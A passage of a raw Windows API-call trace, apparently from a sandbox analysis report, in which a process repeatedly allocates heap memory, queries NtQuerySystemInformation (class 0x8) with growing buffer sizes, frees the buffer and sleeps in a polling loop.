RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.518] Sleep (dwMilliseconds=0x110) [0229.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.534] Sleep (dwMilliseconds=0x110) [0229.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.551] Sleep (dwMilliseconds=0x110) [0229.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.572] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.572] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.573] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.573] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.574] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.574] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.574] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.575] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.575] Sleep (dwMilliseconds=0x110) [0229.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.605] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.607] Sleep (dwMilliseconds=0x110) [0229.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.630] Sleep (dwMilliseconds=0x110) [0229.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.657] Sleep (dwMilliseconds=0x110) [0229.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.709] Sleep (dwMilliseconds=0x110) [0229.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.738] Sleep (dwMilliseconds=0x110) [0229.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.756] Sleep (dwMilliseconds=0x110) [0229.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.766] Sleep (dwMilliseconds=0x110) [0229.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.786] Sleep (dwMilliseconds=0x110) [0229.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.800] Sleep (dwMilliseconds=0x110) [0229.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.817] Sleep (dwMilliseconds=0x110) [0229.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 